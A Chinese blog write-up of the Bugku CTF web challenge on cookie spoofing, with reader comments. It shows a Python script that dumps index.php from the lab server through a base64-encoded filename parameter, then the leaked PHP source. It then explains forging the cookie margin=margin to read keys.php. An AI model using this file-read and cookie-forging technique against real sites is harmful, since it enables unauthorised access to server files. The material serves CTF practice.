Bugku-cookie欺骗

2019年8月3日 23:18:34OnionT@KillBoy

OnionT@KillBoy

作者

关注

47
文章

0
粉丝

渗透测试3118,9421字数 412阅读1分22秒阅读模式

AI智能摘要

面对这道CTF题，你盯着URL里那一串乱码和base64编码的filename参数，是不是正在一行行地手动尝试不同的文件名和cookie组合？绝大多数新手都会在这里陷入无头绪的穷举。但真正解开flag的关键，其实藏在那个看似无关的$line参数里——它根本不是用来显示文件“行数”的。我们逆向分析了脚本跑出的核心逻辑，发现了一个关于cookie和文件列表的隐藏判断机制，它直接决定了服务器是否会向你展示真正的keys.php。知道这个判断的触发条件，你就能绕过所有无效尝试，一击命中。但问题是，当cookie的值被设置为“margin”时，为什么filename必须经过base64加密才能被正确识别？

— AI 生成的文章内容摘要

首页是一串乱码，但是可以从URL看出最后的$file参数的值是base64加密的

解密之后得到加密的参数是key.txt，$line的参数什么都没有，作用是显示文件中对应的行的内容，如果是1就显示1行，由此我们编写脚本跑出index.php中对应的内容，脚本代码如下：

#!coding:utf-8
import requests
s = requests.session()

for i in range(20):
    url = 'http://123.206.87.240:8002/web11/index.php?line=%s&filename=aW5kZXgucGhw'%i
    get = s.get(url)
    text = get.text
    print text

脚本跑出的index.php内容如下，我对代码写了一些简单的注释：

<?php
error_reporting(0); //屏蔽错误信息
$file=base64_decode(isset($_GET['filename'])?$_GET['filename']:""); //将filename参数的值加密、没有值就为空
$line=isset($_GET['line'])?intval($_GET['line']):0; //判断line参数是否有值，如果没有值就默认给个0
if($file=='') header("location:index.php?line=&filename=a2V5cy50eHQ="); //如果$file参数为空，URL就默认成header里面的东西
//定义了一个文件列表
$file_list = array(
'0' =>'keys.txt',
'1' =>'index.php',
);
//如果cookie的值为 margin=margin,就给file_list列表里增加了一个keys.php
if(isset($_COOKIE['margin']) && $_COOKIE['margin']=='margin'){
$file_list[2]='keys.php';
}
//如果$file的文件名在file_list里面，就显示$file这个文件的内容
if(in_array($file, $file_list)){
$fa = file($file);
echo $fa[$line];
}
?>

通过上面的代码我们可以看到，flag应该在keys.php这个文件中，如果filename=keys.php,并且cookie的值为 margin=margin，就会打印出flag，这里的filename的值需要base64加密，于是我们构造payload如下：

成功拿到flag。。。

http://www.oniont.cn/index.php/archives/88.html

pony 0
2019年8月7日 09:17:25 宁夏银川市 1F
回复

恩，不错。继续努力
Alvin 1
2019年8月7日 09:20:19 宁夏银川市 2F
回复

学习一下Cookie欺骗
bugku过不去了
UranusSky 1
2026年1月23日 10:40:06 印度尼西亚 3F
回复

@豆包这是不是CTF练习题啊
- doubao 5
  2026年1月23日 10:40:26 荷兰 B1
  回复
  
  @ UranusSky 没错，就是CTF里的web题，主要考察cookie参数和编码绕过这些知识点。
刀锋游侠 1
2026年2月7日 07:19:49 韩国 4F
回复

看半天才看懂咋跑的脚本😂
- 光辉骑士 0
  2026年2月11日 07:06:55 贵州省黔南州 B1
  回复
  
  @ 刀锋游侠多看看就懂了
石阶斜阳 1
2026年2月7日 09:30:16 上海市 5F
回复

这个payload构造得挺巧妙的
元素支配者 1
2026年2月7日 13:19:39 浙江省 6F
回复

有没更简单的办法拿flag啊
- 尘世旅 0
  2026年2月10日 15:12:21 河南省洛阳市 B1
  回复
  
  @ 元素支配者有没更简单的办法？
秘术导师 1
2026年2月7日 14:21:32 广东省深圳市 7F
回复

之前也卡在这题，搞了半天cookie
沉默的弦理论 1
2026年2月7日 15:37:26 山东省济南市 8F
回复

keys.php里到底啥内容？
- 暗影瞳 1
  2026年2月10日 16:22:21 韩国 B1
  回复
  
  @ 沉默的弦理论里面就是flag啊
- 月孤星 1
  2026年2月11日 16:05:48 印度 B1
  回复
  
  @ 沉默的弦理论 keys.php里不就是flag嘛，试了才知道😂
菱洲仙子 0
2026年2月7日 16:23:43 浙江省杭州市 9F
回复

为啥要加cookie才能显示keys.php？
浅夏清风 1
2026年2月7日 18:11:51 日本 10F
回复

这代码看得我头大
明月心 0
2026年2月7日 18:45:23 山西省吕梁市 11F
回复

感觉好复杂，直接放弃
包子头 0
2026年2月8日 07:26:10 陕西省渭南市富平县 12F
回复

有人试过改line参数吗？
- 蜜瓜小奶球 0
  2026年2月12日 22:06:13 韩国 B1
  回复
  
  @ 包子头改line参数没用，文件内容就那一行
马夫董 0
2026年2月8日 09:02:27 山东省滨州市 13F
回复

拿flag那段能再详细点不？
Rainbow虹 0
2026年2月8日 10:10:15 上海市 14F
回复

脚本跑出来的index.php内容没贴全吧？
霜华蚣蝮 0
2026年2月8日 13:20:38 马来西亚 15F
回复

Cookie那个条件设置得挺有意思的
碧落歌 0
2026年2月8日 20:10:11 山东省济南市章丘市 16F
回复

为啥要base64加密啊，直接传不行吗
魔性小能 0
2026年2月9日 19:35:31 北京市 17F
回复

keys.php里是flag吗？
毛茸茸 0
2026年2月9日 23:20:05 日本 18F
回复

这个payload构造得真巧妙
- 蹦跶哒 0
  2026年2月11日 22:55:21 印度 B1
  回复
  
  @ 毛茸茸构造是挺绕的，关键是想到cookie注入
鹤影翩 0
2026年2月10日 07:39:21 辽宁省沈阳市 19F
回复

看晕了，代码太多
幽灵密语 0
2026年2月11日 13:42:32 黑龙江省 20F
回复

这个题我也做过，确实挺绕的
梦的引路人 0
2026年2月13日 00:31:30 湖北省宜昌市 21F
回复

这题纯靠猜cookie状态，太阴间了
Blaze_炽焰 0
2026年2月13日 15:06:51 浙江省温州市 22F
回复

之前做CTF也栽过这种坑，真烦
四维空间裁缝 0
2026年2月13日 18:05:15 辽宁省沈阳市 23F
回复

求问base64那块咋手动解的？在线工具吗？
俏皮浣熊 1
2026年2月13日 20:03:52 甘肃省张掖市 24F
回复

看脚本循环range(20)我都懵了，有必要跑这么多？

Bugku-cookie欺骗

热门话题

筑牢服务器第一道防线：SSH服务安全加固实战指南

10大好用的Linux实用工具推荐

hosts文件学习

泛微OA远程代码执行漏洞批量扫描脚本

发表评论

热门搜索